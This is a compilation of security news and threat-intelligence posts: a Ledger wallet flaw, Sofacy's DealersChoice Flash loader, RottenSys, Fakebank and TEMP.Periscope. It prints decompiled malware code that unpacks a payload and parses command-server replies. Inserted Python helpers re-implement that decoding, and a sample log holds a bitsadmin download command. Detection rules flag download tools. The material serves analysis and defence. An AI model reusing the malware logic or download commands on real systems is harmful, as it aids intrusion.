“You’re essentially trusting a non-secure chip not to change what’s displayed on the screen or change what the buttons are saying,” Rashid said in an interview with KrebsOnSecurity. “You can install whatever you want on that non-secure chip, because the code running on there can lie to you.”

Kenneth White, director of the Open Crypto Audit Project, had an opportunity to review Rashid’s findings prior to their publication today. White said he was impressed with the elegance of the proof-of-concept attack code, which Rashid sent to Ledger approximately four months ago. A copy of Rashid’s research paper on the vulnerability is available here (PDF). A video of Rashid demonstrating his attack is below.

White said Rashid’s code subverts the security of the Ledger’s process for generating a backup code for a user’s private key, which relies on a random number generator that can be made to produce non-random results.

“In this case [the attacker] can set it to whatever he wants,” White said. “The victim generates keys and backup codes, but in fact those codes have been predicted by the attacker in advance because he controls the Ledger’s random number generator.”

Rashid said Ledger initially dismissed his findings as implausible. But in a blog post published today, Ledger says it has since fixed the flaw Rashid found — as well as others discovered and reported by different security researchers — in a firmware update that brings Ledger Nano S devices from firmware version 1.3.1 to version 1.4.1 (the company actually released the firmware update on March 6, potentially giving attackers time to reverse engineer Rashid’s method).

The company is still working on an update for its pricier Ledger Blue devices, which company chief security officer Charles Guillemet said should be ready soon. Guillemet said Nano-S devices should alert users that a firmware update is available when the customer first plugs the device into a computer.

“The vulnerability he found was based on the fact that the secure element tries to authenticate the microcontroller, and that authentication is not strong enough,” Guillemet told KrebsOnSecurity. “This update does authentication more tightly so that it’s not possible to fool the user.”

Rashid said that, unlike its competitors in the hardware wallet industry, Ledger includes no tamper protection seal or any other device that might warn customers that a Nano S has been physically opened or modified prior to its first use by the customer.

“They make it so easy to open the device that you can take your fingernail and open it up,” he said.

Asked whether Ledger intends to add tamper protection to its products, Guillemet said such mechanisms do not add any security.

“For us, a tamper proof seal is nothing that adds security to the device because it’s very easy to counterfeit,” Guillemet said. “You can buy some security seals on the web. For us, it’s a lie to our customers to use this kind of seal to prove the genuineness of our product.”

Guillemet said despite Rashid’s findings, he sees no reason to change his recommendation that interested customers should feel free to purchase the company’s products through third party vendors.

“As we have upgraded our solution to prove the genuineness of our product using cryptographic checks, I don’t see why we should change this statement,” he said.

Nevertheless, given that many cryptocurrency owners turn to hardware wallets like Ledger to safeguard some or all of their virtual currency, it’s probably a good idea if you are going to rely on one of these devices to purchase it directly from the source, and to apply any available firmware updates before using it.

Author: BrianKrebs


Sofacy Uses DealersChoice to Target European Government Agency


Back in October 2016, Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, which we also documented in our December 2016 publication discussing Sofacy’s larger campaign.

On March 12 and March 14, we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice. The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server, but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed.

One of the differences was a particularly clever evasion technique: to our knowledge this has never been observed in use. With the previous iterations of DealersChoice samples, the Flash object would immediately load and begin malicious tasks. In the March attacks, the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on. Also, DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system.

The overall process to result in a successful exploitation is:

  1. User must open the Microsoft Word email attachment
  2. User must scroll to page three of the document, which will run the DealersChoice Flash object
  3. The Flash object must contact an active C2 server to download an additional Flash object containing exploit code
  4. The initial Flash object must contact the same C2 server to download a secondary payload
  5. Victim host must have a vulnerable version of Flash installed

The Attack

The attack involving this updated variant of DealersChoice was targeting a European government organization. The attack relied on a spear-phishing email with a subject of “Defence & Security 2018 Conference Agenda” that had an attachment with a filename of “Defence & Security 2018 Conference Agenda.docx”. The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the “Underwater Defence & Security 2018 Conference” here.

Opening the attached “Defence & Security 2018 Conference Agenda.docx” file does not immediately run malicious code to exploit the system. Instead, the user must scroll to the third page of the document, which will load a Flash object that contains ActionScript that will attempt to exploit the user’s system to install a malicious payload. The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice. This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse it.

We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page. According to the document.xml file, the DealersChoice loader SWF exists after the “covert-shores-small.png” image file within the delivery document. This image file exists on the third page of the document, so the user would have to scroll down in the document to this third page to get the SWF file to run. The user may not notice the Flash object on the page, as Word displays it as a tiny black box in the document, as seen in Figure 1. This is an interesting anti-sandbox technique, as it requires human interaction prior to the document exhibiting any malicious activity.


Figure 1 Flash object appearing as a small black box in delivery document

Updated DealersChoice

This DealersChoice Flash object shares a similar process to previous variants; however, it appears that the Sofacy actors have made slight changes to its internal code. Also, it appears that the actors used ActionScript from an open source video player called “f4player”, which is freely available on GitHub with the following description:

f4Player is an open source flash (AS3) video player and library project. It is so small that it is only 10kb (with skin file) and totally free under GPL license.

The Sofacy developer modified the f4player’s ActionScript to include additional code to load an embedded Flash object. The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function (“skinEvent2”) that plays the decrypted object, as seen in the code snippet below:

var skinEvent2:Function = function(param1:Event):void
{
    skin2 = param1.currentTarget.content;
    var mov:Loader = new Loader();
    var b:ByteArray = new this.Mov();   // the embedded, XOR-obfuscated SWF
    var k:uint = 82;                    // single-byte XOR key (0x52)
    var i:uint = 4;                     // the first 4 bytes are left untouched
    while(i < b.length)
    {
        b[i] = b[i] ^ k;
        i++;
    }
    // remainder of the handler (passing the decoded bytes to the Loader) omitted in the excerpt
};

The above code allows DealersChoice to load a second SWF object, specifically loading it with an argument that includes a C2 URL of “hxxp://ndpmedia24[.]com/0pq6m4f.m3u8”.

The embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server’s ‘crossdomain.xml’ file in order to obtain permissions to load additional Flash objects from the C2 domain. The ActionScript relies on event listeners to call specific functions when the event “Event.COMPLETE” is triggered after successful HTTP requests are issued to the C2 server. The event handlers call functions with the following names, which includes an incrementing number that represents the order in which the functions are called:

  • onload1
  • onload2
  • onload3
  • onload5

With these event handlers created, the ActionScript starts by gathering system data from the flash.system.Capabilities.serverString property (just like in the original DealersChoice.B samples) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded. When this HTTP request completes, the event listener will call the ‘onload1’ function.

The ‘onload1’ function parses the response data from the request to the C2 URL using regular expressions. According to the following code snippet, it appears the regular expression is looking for a hexadecimal string after “/” and before “/sec”, as well as any string between “/hls/” and “/tracks”:

var data:String = ;                         // response body of the C2 request (value elided in the excerpt)
var p1:RegExp = /\/([0-9a-f]+)\/sec/gim;    // hexadecimal string between "/" and "/sec"
r1 = p1.exec(data);                         // first match: decryption key for the SWF
var r2:Array = p1.exec(data);               // second match: not used
var p2:RegExp = /\/hls\/(.+)\/tracks/gim;   // anything between "/hls/" and "/tracks"
var r3:Array = p2.exec(data);               // first match: URL of the malicious SWF
r4 = p2.exec(data);                         // second match: URL of the payload

The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Streaming (HLS) traffic, which is a protocol that uses HTTP to deliver audio and video files for streaming. The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate. The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server. The following is a list of these variables and their purpose:

Variable   Purpose
r1         Used as the decryption key for the downloaded SWF file. This will be a 16-byte hexadecimal string.
r2         Not used.
r3         Used as the URL of the HTTP request issued by the onload1 function, specifically the URL from which the malicious SWF that exploits the system is fetched.
r4         Used as the URL of the HTTP request issued by the onload2 function, specifically the URL from which the payload that runs after successful exploitation is fetched.

The ‘onload1’ function then sends an HTTP GET request to the C2 domain using the value stored in the ‘r3’ variable as a URL. When this HTTP request completes, the event listener will call the ‘onload2’ function.

The ‘onload2’ function decrypts the response received from the HTTP request issued in ‘onload1’ function. It does so by calling a sub-function to decrypt the content, using the value stored in the ‘r1’ variable as a key. The sub-function to decrypt the content skips the first 4 bytes, suggesting that the first four bytes of the downloaded content is in cleartext (most likely the “FWS” or “CWS” header to look legitimate).

After decrypting the content, the ‘onload2’ function will issue another HTTP GET request with the system data as a parameter, but this time to the C2 using a URL from the ‘r4’ variable. When this request completes, the event listener will call the ‘onload3’ function.

The ‘onload3’ function will take the response to the HTTP request in ‘onload2’ and treat it as the payload. The ActionScript will read each byte of the C2 response and get the hexadecimal value of each byte and create a text array of 4-byte hexadecimal values with “0x” prepended and “,” appended to each using the following code:

sh = she + ("0x" + hex.substr(i + 6,2) + hex.substr(i + 4,2) + hex.substr(i + 2,2) + hex.substr(i,2) + ",");

This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable (PE) payload. The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in ‘onload2’. This function creates an event listener for when the SWF file is successfully loaded, which will call the ‘onload5’ function.

The ‘onload5’ function is responsible for adding the newly loaded SWF object as a child object to the current running object using the following code:


This loads the SWF file, effectively running the malicious code on the system. During our analysis, we were unable to coerce the C2 into providing a malicious SWF or payload. As mentioned in our previous blogs on DealersChoice, the payload of choice for previous variants was SofacyCarberp (Seduploader), but we have no evidence to suggest this tool was used in this attack. We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack.
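The following Python is an added analysis aid, not code from the Unit 42 post. It re-expresses three of the ActionScript transformations described above so an analyst can check a sample offline: the XOR unpacking of the embedded loader SWF (key 82, first four bytes left intact), the two regular expressions that onload1 runs over the HLS-like C2 response, and the little-endian "0x........," list that onload3 builds from the downloaded bytes. The C2 response and byte strings below are constructed for illustration, and the loop bounds in to_dword_hex_list (whole 4-byte groups only) are an assumption rather than something the post states.

```python
"""Analysis helpers for the DealersChoice stages described above (added example)."""
import re

SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")   # uncompressed, zlib and LZMA SWF headers


def xor_unpack_embedded_swf(blob: bytes, key: int = 82, skip: int = 4) -> bytes:
    """Undo the skinEvent2 loop: every byte after the first `skip` is XORed with `key`."""
    return blob[:skip] + bytes(b ^ key for b in blob[skip:])


def looks_like_swf(data: bytes) -> bool:
    """Sanity check on a decoded object: a real SWF starts with FWS, CWS or ZWS."""
    return data[:3] in SWF_SIGNATURES


# The onload1 patterns (the AS3 literals escape the slashes; Python does not need to).
P1 = re.compile(r"/([0-9a-f]+)/sec", re.IGNORECASE | re.MULTILINE)
P2 = re.compile(r"/hls/(.+)/tracks", re.IGNORECASE | re.MULTILINE)


def parse_c2_response(data: str) -> dict:
    """Mirror r1..r4: the first and second match of each pattern, in order."""
    keys = P1.findall(data)
    urls = P2.findall(data)
    return {
        "r1": keys[0] if keys else None,            # decryption key for the exploit SWF
        "r2": keys[1] if len(keys) > 1 else None,   # matched but never used
        "r3": urls[0] if urls else None,            # URL of the exploit SWF (onload1 request)
        "r4": urls[1] if len(urls) > 1 else None,   # URL of the payload (onload2 request)
    }


def to_dword_hex_list(payload: bytes) -> str:
    """Rebuild the onload3 string: each 4-byte group as a little-endian "0x........," token."""
    hexstr = payload.hex()
    tokens = []
    for i in range(0, len(hexstr) - 7, 8):          # assumption: a trailing partial group is dropped
        tokens.append("0x" + hexstr[i + 6:i + 8] + hexstr[i + 4:i + 6]
                      + hexstr[i + 2:i + 4] + hexstr[i:i + 2] + ",")
    return "".join(tokens)


# Constructed C2 response in the HLS-like shape the regexes expect.
SAMPLE_RESPONSE = (
    "#EXTM3U\n"
    "/0123456789abcdef0123456789abcdef/sec\n"
    "/hls/stage2.swf/tracks\n"
    "/hls/stage3.bin/tracks\n"
)

if __name__ == "__main__":
    print(parse_c2_response(SAMPLE_RESPONSE))
```

The header check is the quick way to confirm a decoded blob: if `xor_unpack_embedded_swf` yields bytes that do not start with FWS or CWS, either the key or the skipped prefix differs from the variant analysed above.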

Linkage to Prior Campaign

The delivery document used in this attack was last modified by a user named ‘Nick Daemoji’, which provides a linkage to previous Sofacy related delivery documents. The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp/Seduploader payloads, as discussed in Talos’ blog. This overlap also points to a similar social engineering theme between these two campaigns, as both used content from upcoming military and defense conferences as a lure.


The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns. In the most recent variant, Sofacy modified the internals of the malicious scripts, but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server. Unlike previous samples, this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object. The required user interaction turned out to be an interesting anti-sandbox technique that we had not seen this group perform in the past.

Indicators of Compromise


0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 (Defence & Security 2018 Conference Agenda.docx)


Macro-laden documents




The post Sofacy Uses DealersChoice to Target European Government Agency appeared first on Palo Alto Networks Blog.

Author: Robert Falcone

Pre-Installed Malware Found On 5 Million Popular Android Phones

Security researchers have discovered a massive continuously growing malware campaign that has already infected nearly 5 million mobile devices worldwide.

Dubbed RottenSys, the malware, disguised as a ‘System Wi-Fi service’ app, came pre-installed on millions of brand new smartphones manufactured by Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE, added somewhere along the supply chain.

All these affected devices were shipped through Tian Pai, a Hangzhou-based mobile phone distributor, but researchers are not sure if the company has direct involvement in this campaign.

According to Check Point Mobile Security Team, who uncovered this campaign, RottenSys is an advanced piece of malware that doesn’t provide any secure Wi-Fi related service but takes almost all sensitive Android permissions to enable its malicious activities.

“According to our findings, the RottenSys malware began propagating in September 2016. By March 12, 2018, 4,964,460 devices were infected by RottenSys,” researchers said.

To evade detection, the fake System Wi-Fi service app comes initially with no malicious component and doesn’t immediately start any malicious activity.

Instead, RottenSys has been designed to communicate with its command-and-control servers to get the list of required components, which contain the actual malicious code.

RottenSys then downloads and installs each of them accordingly, using the “DOWNLOAD_WITHOUT_NOTIFICATION” permission that does not require any user interaction.

Hackers Earned $115,000 in Just Last 10 Days


At this moment, the massive malware campaign pushes an adware component to all infected devices that aggressively displays advertisements on the device’s home screen, as pop-up windows or full-screen ads to generate fraudulent ad-revenues.

“RottenSys is an extremely aggressive ad network. In the past 10 days alone, it popped aggressive ads 13,250,756 times (called impressions in the ad industry), and 548,822 of which were translated into ad clicks,” researchers said.

According to the CheckPoint researchers, the malware has made its authors more than $115,000 in the last 10 days alone, but the attackers are up to “something far more damaging than simply displaying uninvited advertisements.”

Since RottenSys has been designed to download and install any new components from its C&C server, attackers can easily weaponize or take full control over millions of infected devices.

The investigation also disclosed some evidence that the RottenSys attackers have already started turning millions of those infected devices into a massive botnet network.

Some infected devices have been found installing a new RottenSys component that gives attackers more extensive abilities, including silently installing additional apps and UI automation.

“Interestingly, a part of the controlling mechanism of the botnet is implemented in Lua scripts. Without intervention, the attackers could re-use their existing malware distribution channel and soon grasp control over millions of devices,” researchers noted.

This is not the first time CheckPoint researchers have found top-notch brands affected by a supply chain attack.

Last year, the firm found smartphones from Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo infected with two pieces of pre-installed malware (the Loki Trojan and SLocker mobile ransomware) designed to spy on users.

How to Detect and Remove Android Malware?

To check if your device is infected with this malware, go to Android system settings → App Manager, and then look for the following possible malware package names:

  • (每日黄历)
  • com.changmi.launcher (畅米桌面)
  • (系统WIFI服务)
  • com.system.service.zdsgt

If any of the above is in the list of your installed apps, simply uninstall it.


New Fakebank Variant Intercepts Calls to Connect Banking Users to Scammers

A new variant of the Fakebank malware can intercept Android users’ banking-related incoming and outgoing calls.

We’ve recently come across a new malicious behavior among apps infected with Android.Fakebank: interception of phone calls made by users to their banks. These apps are sourced from third-party Android markets and some social media sites. We’ve discovered 22 apps so far, targeting Korean bank clients.

The Fakebank variants we’ve seen in the past usually collect bank SMS, record phone calls to banks, and display a fake bank login UI. This new variant, however, is able to intercept calls both incoming and outgoing.

When the app is launched, it collects and submits the user’s personal information to a command and control (C&C) server, and presents its display (Figure 1).

Figure 1. Malware UI spoofing a legitimate bank app

The server will respond with configuration specifying the phone numbers that will be used in the scam (Figure 2).

Figure 2. Sample configuration for call interception (numbers have been modified)

Four numbers are passed to the malware app:

  • phoneNum_ChangeNum: The legitimate bank’s phone number that will be replaced when the user dials it
  • phoneNum_To: The number of a scammer, ready to impersonate a bank agent. This number will actually be dialed when the user tries to call the bank
  • phoneNum_Come: The number of a scammer that will call the victim. When this number calls the phone, the fake caller ID overlay will appear
  • phoneNum_ShowNum: The legitimate bank number that should be used to overlay the scammer’s incoming/outgoing caller ID

This allows the app to deceive users, when the configured phone numbers appear for an outgoing or incoming call:

  • Outgoing call: When users call a real banking phone number, the malware is able to intercept and transfer the call to the scammer’s configured phone number. Additionally, the app will overlay a fake UI to reflect the legitimate number.
  • Incoming call: When a call comes in from a scammer, the app will overlay a fake UI dialog that spoofs a legitimate bank caller ID and number.


The APIs and associated permission used to carry out this deception (android.permission.SYSTEM_ALERT_WINDOW) have evolved across Android versions. This malware optimizes its version targets to avoid requesting permissions from the user:

  • For versions prior to Android 6, the permission is required to be declared in the manifest (and will appear in the dialog on install).
  • For Android 6 and Android 7, the permission is granted without prompting the user if the permission is declared in the manifest and the app originates in Google Play. However, this automatic grant is also grandfathered if the target version is set below Android 6. The malware targets Android 5 to gain this permission silently.
  • Starting in Android 8, overlaying a system window from an app is not allowed, and so the malware can’t carry out its deception.
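One way a defender can turn the version-targeting trick above into a triage check, as an added example that is not code from the Symantec post: parse a decoded AndroidManifest.xml and flag SYSTEM_ALERT_WINDOW declared together with a targetSdkVersion below 23 (the API level of Android 6.0), which is exactly the combination that obtains the overlay permission on Android 6 and 7 without a prompt. The manifest, its placeholder package name, and the set of call-related permissions used as a second signal are constructed or assumed here; the post does not name them.

```python
"""Manifest triage for the silent overlay grant described above (added example)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
OVERLAY = "android.permission.SYSTEM_ALERT_WINDOW"
MARSHMALLOW_API = 23   # Android 6.0
# Permissions an app needs to watch or redirect calls (assumed relevant; not named in the post).
CALL_PERMS = {
    "android.permission.PROCESS_OUTGOING_CALLS",
    "android.permission.CALL_PHONE",
    "android.permission.READ_PHONE_STATE",
}


def _attr(el, name: str, default: str = "") -> str:
    """Read an android:-namespaced attribute."""
    return el.get("{%s}%s" % (ANDROID_NS, name), default)


def analyze_manifest(xml_text: str) -> dict:
    """Return the overlay/targetSdk findings for one decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = {_attr(e, "name") for e in root.iter("uses-permission")}
    sdk = root.find("uses-sdk")
    # Without <uses-sdk>, Android treats both min and target SDK as 1.
    target = int(_attr(sdk, "targetSdkVersion", "1")) if sdk is not None else 1
    silent = OVERLAY in perms and target < MARSHMALLOW_API
    return {
        "package": root.get("package", ""),
        "target_sdk": target,
        "overlay_declared": OVERLAY in perms,
        "silent_overlay_grant": silent,          # the "target Android 5" trick from the post
        "call_perms": sorted(perms & CALL_PERMS),
        "suspicious": silent and bool(perms & CALL_PERMS),
    }


# Constructed manifest; the package name is a placeholder, not a real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.placeholder.bankapp">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="21"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""

if __name__ == "__main__":
    print(analyze_manifest(SAMPLE_MANIFEST))
```

A low targetSdkVersion on its own is common in legacy apps, which is why the check only reports `suspicious` when the overlay permission is paired with telephony permissions; the combination, not either half, is what the call-interception behaviour above requires.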

In addition to tricking users into conversations with scammers, this malicious app sends call events to the C&C server. It also has a number of layouts customized to popular phone layouts in Korea.

Figure 3. Handset-specific layouts

Author: Shaun Aimoto, Martin Zhang

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S.Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service
(FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been
tracking an ongoing wave of intrusions targeting engineering and
maritime entities, especially those connected to South China Sea
issues. The campaign is linked to a group of suspected Chinese cyber
espionage actors we have tracked since 2013, dubbed TEMP.Periscope.
The group has also been reported as “Leviathan”
by other security firms.

The current campaign is a sharp escalation of detected activity
since summer 2017. Like multiple other Chinese cyber espionage actors,
TEMP.Periscope has recently re-emerged and has been observed
conducting operations with a revised toolkit. Known targets of this
group have been involved in the maritime industry, as well as
engineering-focused entities, and include research institutes,
academic organizations, and private firms in the United States.
FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on
maritime-related targets across multiple verticals, including
engineering firms, shipping and transportation, manufacturing,
defense, government offices, and research universities. However, the
group has also targeted professional/consulting services, high-tech
industry, healthcare, and media/publishing. Identified victims were
mostly found in the United States, although organizations in Europe
and at least one in Hong Kong have also been affected. TEMP.Periscope
overlaps in targeting, as well as tactics, techniques, and procedures
(TTPs), with TEMP.Jumper, a group that also overlaps significantly
with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a
relatively large library of malware shared with multiple other
suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves
    commands from hidden strings in compromised webpages and actor
    controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a
    reverse shell, and modifying its command and control (C2)
    configuration.
  • PHOTO: a DLL backdoor also reported publicly
    as “Derusbi”, capable of obtaining directory, file, and drive
    listing; creating a reverse shell; performing screen captures;
    recording video and audio; listing, terminating, and creating
    processes; enumerating, starting, and deleting registry keys and
    values; logging keystrokes, returning usernames and passwords from
    protected storage; and renaming, deleting, copying, moving, reading,
    and writing to files.
  • HOMEFRY: a 64-bit Windows password
    dumper/cracker that has previously been used in conjunction with
    AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with
    XOR x56. The malware accepts up to two arguments at the command
    line: one to display cleartext credentials for each login session,
    and a second to display cleartext credentials, NTLM hashes, and
    malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as
    a different user, move, and delete files locally, schedule remote AT
    jobs, perform host discovery on connected networks, scan for open
    ports on hosts in a connected network, and retrieve information
    about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes
    Microsoft .NET code within HTTP POST commands. This allows the shell
    to upload and download files, execute applications with web server
    account permissions, list directory contents, access Active
    Directory, access databases, and any other action allowed by the
    .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past
operations and could use again, though these have not been seen in the
current wave of activity:

  • Beacon: a backdoor that
    is commercially available as part of the Cobalt Strike software
    platform, commonly used for pen-testing network environments. The
    malware supports several capabilities, such as injecting and
    executing arbitrary code, uploading and downloading files, and
    executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to
    legitimate websites such as Github and Microsoft’s Technet portal.
    Used by APT17 and
    other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including
    the use of probably compromised email accounts.
  • Lure
    documents using CVE-2017-11882 to drop malware.
  • Stolen code
    signing certificates used to sign malware.
  • Use of
    bitsadmin.exe to download additional tools.
  • Use of
    PowerShell to download additional tools.
  • Using
    C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access
    webshells on internet-facing systems.
  • Using Windows
    Management Instrumentation (WMI)
    for persistence
  • Using Windows Shortcut files (.lnk)
    in the Startup folder that invoke the Windows Scripting Host
    (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the
    adversary on legitimate websites/forums such as Github and
    Microsoft’s TechNet portal.
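The TTPs above translate directly into host-based detection logic. The following Python is an added example, not FireEye's code or detection content: it runs a handful of string rules over process-creation events and reports which ones fire. The pipe-separated event layout (time|host|parent_image|image|command_line), the rule names, the host name, the paths and the example.invalid URL are all constructed for illustration; EQNEDT32.EXE is the Equation Editor process that CVE-2017-11882 lure documents abuse, so any child of it is worth a look.

```python
"""Process-creation log triage for the TEMP.Periscope TTPs listed above (added example)."""
import re
from typing import Callable, Dict, List, Tuple

STAGING_DIRS = (r"c:\windows\debug", r"c:\perflogs")
DOWNLOAD_CMDLETS = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)
SCRIPT_EXT = re.compile(r"\.jse?\b", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Split one event; image names are lower-cased and stripped of their directory."""
    time, host, parent, image, cmd = line.split("|", 4)

    def basename(path: str) -> str:
        return path.lower().rsplit("\\", 1)[-1]

    return {"time": time, "host": host, "parent": basename(parent),
            "image": basename(image), "cmd": cmd}


RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    # bitsadmin.exe used to pull additional tools
    ("bitsadmin_download", lambda ev: ev["image"] == "bitsadmin.exe" and "/transfer" in ev["cmd"].lower()),
    # PowerShell used to pull additional tools
    ("powershell_download", lambda ev: ev["image"] == "powershell.exe"
     and DOWNLOAD_CMDLETS.search(ev["cmd"]) is not None),
    # wscript.exe running a JScript file (the Startup-folder .lnk persistence)
    ("wscript_jscript", lambda ev: ev["image"] == "wscript.exe"
     and SCRIPT_EXT.search(ev["cmd"]) is not None),
    # C:\Windows\Debug or C:\Perflogs referenced on a command line (staging directories)
    ("staging_dir_use", lambda ev: any(d in ev["cmd"].lower() for d in STAGING_DIRS)),
    # Equation Editor spawning a child process: CVE-2017-11882 lure document
    ("equation_editor_child", lambda ev: ev["parent"] == "eqnedt32.exe"),
]


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        hits.extend((idx, name) for name, pred in RULES if pred(ev))
    return hits


# Constructed events; nothing here comes from a real incident.
SAMPLE_LOG = [
    r"2018-03-01T10:00:01Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
    r"2018-03-01T10:02:13Z|ws01|C:\Windows\System32\cmd.exe|C:\Windows\System32\bitsadmin.exe|"
    r"bitsadmin.exe /transfer job /download /priority high http://example.invalid/t.dat C:\Perflogs\t.dat",
    r"2018-03-01T10:03:40Z|ws01|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|"
    r"C:\Windows\System32\cmd.exe|cmd.exe /c start %TEMP%\x.exe",
    r"2018-03-01T10:05:02Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|"
    r"wscript.exe C:\Users\u\AppData\Roaming\com4.js",
    r"2018-03-01T10:06:30Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\u\notes.txt",
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_LOG):
        print(f"event {idx}: {rule}")
```

The bitsadmin event trips two rules at once (the download itself and the Perflogs staging path), which is the kind of overlap worth scoring higher than either rule alone; the WMI persistence and stolen-certificate TTPs in the list need different telemetry (WMI subscription events and Authenticode checks) and are not covered by process-creation logs.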


The current wave of identified intrusions is consistent with
TEMP.Periscope and likely reflects a concerted effort to target
sectors that may yield information that could provide an economic
advantage, research and development data, intellectual property, or an
edge in commercial negotiations.

As we continue to investigate this activity, we may identify
additional data leading to greater analytical confidence linking the
operation to TEMP.Periscope or other known threat actors, as well as
previously unknown campaigns.


File           MD5                               Description
x.js           3fefa55daeb167931975c22df3eca20a  HOMEFRY, a 64-bit Windows password dumper/cracker
mt.exe         40528e368d323db0ac5c3f5e1efe4889  MURKYTOP, a command-line reconnaissance tool
com4.js        a68bf5fce22e7f1d6f999b7a580ae477  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

File                                           MD5                               Description
green.ddd                                      3eb6f85ac046a96204096ab65bbd3e7e  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages
BGij                                           6e843ef4856336fe3ef4ed27a4c792b1  Beacon, a commercially available backdoor (part of the Cobalt Strike platform)
msresamn.ttf                                   a9e7539c1ebe857bae6efceefaa9dd16  PHOTO, also reported as “Derusbi”
1024-aa6a121f98330df2edee6c4391df21ff43a33604  bd9e4c82bf12c4e7a58221fc52fed705  BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

Author: FireEye

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available Proof-of-Concept and package it as a drive-by download instead.

On March 9th, MDNC discovered that a less common, but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware”.

